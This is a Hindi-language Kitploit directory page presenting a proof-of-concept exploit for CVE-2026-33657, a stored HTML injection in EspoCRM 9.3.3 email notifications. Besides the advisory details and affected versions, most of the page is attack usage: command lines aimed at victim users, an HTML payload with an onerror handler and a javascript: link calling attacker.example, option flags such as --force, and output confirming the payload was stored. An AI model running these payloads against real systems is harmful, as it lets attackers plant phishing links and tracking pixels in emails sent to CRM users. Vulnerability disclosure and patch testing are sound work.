Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33657 — EspoCRM 9.3.3 - ईमेल सूचनाओं में संग्रहीत HTML इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/entrovyx/cve-2026-33657
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubentrovyx/cve-2026-33657

CVE-2026-33657

EspoCRM 9.3.3 - ईमेल सूचनाओं में संग्रहीत HTML इंजेक्शन

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33657 - EspoCRM 9.3.3 में ईमेल सूचनाओं में संग्रहीत HTML इंजेक्शन

EspoCRM 9.3.3 ईमेल सूचनाओं में संग्रहीत HTML इंजेक्शन के लिए प्रमाणित प्रूफ-ऑफ-कॉन्सेप्ट।

सारांश

EspoCRM 9.3.3 स्ट्रीम-नोट सूचना ईमेल को नोट बॉडी को Markdown के साथ रूपांतरित करके और परिणामी HTML को ट्रिपल ब्रेसेस ({{{post}}}) के साथ ईमेल टेम्पलेट्स में डालकर प्रस्तुत करता है। एक प्रमाणित उपयोगकर्ता जो स्ट्रीम पोस्ट बना सकता है और सूचना ट्रिगर कर सकता है, वह हमलावर-नियंत्रित HTML संग्रहीत कर सकता है जो बाद में उत्पन्न ईमेल बॉडी में प्रस्तुत किया जाता है।

यह एक्सप्लॉइट प्रवाह के हमलावर-नियंत्रित दूरस्थ भाग को निष्पादित करता है:

  1. EspoCRM में प्रमाणित होता है।
  2. वैकल्पिक रूप से /api/v1/App/user के साथ संस्करण का फिंगरप्रिंट लेता है।
  3. HTML युक्त एक दुर्भावनापूर्ण Note बनाता है।
  4. सूचना लक्ष्य को कतारबद्ध करने के लिए --mention या --target-user-id का उपयोग करता है।
  5. पुष्टि करता है कि पेलोड संग्रहीत है और सूचना लक्ष्य API प्रतिक्रिया में मौजूद है।

ईमेल वितरण तब होता है जब EspoCRM का सामान्य जॉब या cron कतारबद्ध सूचना को संसाधित करता है।

SendEmailNotifications

प्रभावित संस्करण

  • असुरक्षित: EspoCRM 9.3.3
  • सुरक्षित: EspoCRM 9.3.4
  • परामर्श: https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574
  • CVE: CVE-2026-33657
  • CWE: CWE-80

आवश्यकताएँ

  • Python 3
  • requests
  • मान्य EspoCRM क्रेडेंशियल्स
  • स्ट्रीम Note रिकॉर्ड बनाने की क्षमता
  • एक सूचना लक्ष्य:
    • मेंशन ईमेल सूचनाओं के लिए --mention <username>, या
    • लक्षित स्ट्रीम-पोस्ट सूचनाओं के लिए --target-user-id <id>

निर्भरता स्थापित करें:

root@kitploit:~
python3 -m pip install requests

उपयोग

पसंदीदा मेंशन-आधारित पथ:

root@kitploit:~
python3 CVE-2026-33657.py \
  -u http://127.0.0.1:8083 \
  -U testuser \
  -P 'Admin12345!' \
  --mention admin

कस्टम ट्रैकिंग URL का उपयोग करें:

root@kitploit:~
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --mention victim \
  --tracking-url https://attacker.example/pixel.gif

पूरी तरह से कस्टम HTML पेलोड का उपयोग करें:

root@kitploit:~
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --mention victim \
  --payload '<img src="https://attacker.example/p.gif" onerror="alert(33657)"><a href="javascript:alert(33657)">open</a>'

मेंशन के बजाय विशिष्ट उपयोगकर्ता आईडी को लक्षित करें:

root@kitploit:~
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --target-user-id 0123456789abcdef0 \
  --target-user-name 'Victim User'

केवल फिंगरप्रिंट, नोट बनाए बिना:

root@kitploit:~
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --detect-only

विकल्प

root@kitploit:~
-u, --url                 आधार EspoCRM URL
-U, --username            EspoCRM उपयोगकर्ता नाम
-P, --password            EspoCRM पासवर्ड
--mention                 मेंशन करने के लिए उपयोगकर्ता नाम, @ के बिना
--target-user-id          लक्षित स्ट्रीम-पोस्ट सूचनाओं के लिए उपयोगकर्ता आईडी
--target-user-name        --target-user-id के लिए प्रदर्शन नाम
--payload                 Note में संग्रहीत करने के लिए कच्चा HTML पेलोड
--tracking-url            डिफ़ॉल्ट पेलोड द्वारा उपयोग किया जाने वाला ट्रैकिंग पिक्सेल URL
--link-url                डिफ़ॉल्ट पेलोड द्वारा उपयोग किया जाने वाला लिंक URL
--marker                  पेलोड से पहले जोड़ा जाने वाला मार्कर टेक्स्ट
--detect-only             केवल संस्करण फिंगरप्रिंट; Note न बनाएं
--skip-version-check      एक्सप्लॉइटेशन से पहले /api/v1/App/user छोड़ें
--force                   संस्करण फिंगरप्रिंट 9.3.3 न होने पर भी जारी रखें
--insecure                TLS प्रमाणपत्र सत्यापन अक्षम करें

अपेक्षित आउटपुट

एक सफल रन एक दुर्भावनापूर्ण नोट बनाता है और सूचना लक्ष्य की पुष्टि करता है:

root@kitploit:~
[*] /api/v1/App/user: HTTP 200
[*] Detected version: 9.3.3
[+] Version fingerprint is vulnerable: EspoCRM 9.3.3.
[*] Creating malicious Note as testuser
[*] Note response: HTTP 200 ...
[+] Exploit payload stored in Note post.
[+] Note id: 69fddeef8db756271
[+] Mention parsed: @admin -> user id 69fdcfb66c34ccb81
[+] Notification target list returned by API: 69fdcfb66c34ccb81
[+] Complete remote trigger submitted.

एक असुरक्षित इंस्टेंस पर, उत्पन्न HTML ईमेल बॉडी इंजेक्ट किए गए HTML को संरक्षित करती है। एक लैब कैप्चर इस तरह दिखता है:

root@kitploit:~
<img src="http://attacker.example/full-process.gif" width="1" height="1" onerror="alert(33657)">
<a href="javascript:alert(33657)" style="color:red">re-auth</a>

लैब सत्यापन

स्थानीय EspoCRM लैब में, एक्सप्लॉइट चलाने के बाद, सूचना जॉब ट्रिगर करें:

root@kitploit:~
sudo -u www-data php command.php run-job SendEmailNotifications

परिणामी ईमेल बॉडी में text/html भाग में इंजेक्ट किया गया HTML होना चाहिए।

नोट्स

  • एक्सप्लॉइट को लक्ष्य तक शेल एक्सेस की आवश्यकता नहीं है; शेल एक्सेस केवल कतारबद्ध ईमेल जॉब के स्थानीय लैब सत्यापन के लिए उपयोगी है।
  • यदि API @@version रिपोर्ट करता है, तो लक्ष्य संभवतः सोर्स-ट्री बिल्ड है। स्क्रिप्ट जारी रहती है क्योंकि अंतर्निहित कोड अभी भी असुरक्षित 9.3.3 टैग हो सकता है।
  • यदि --mention पार्स किया गया मेंशन उत्पन्न नहीं करता है, तो हमलावर की messagePermission और mentionPermission जांचें, और पुष्टि करें कि लक्ष्य उपयोगकर्ता नाम मौजूद है और सूचनाएं प्राप्त कर सकता है।
टूल डाउनलोड करें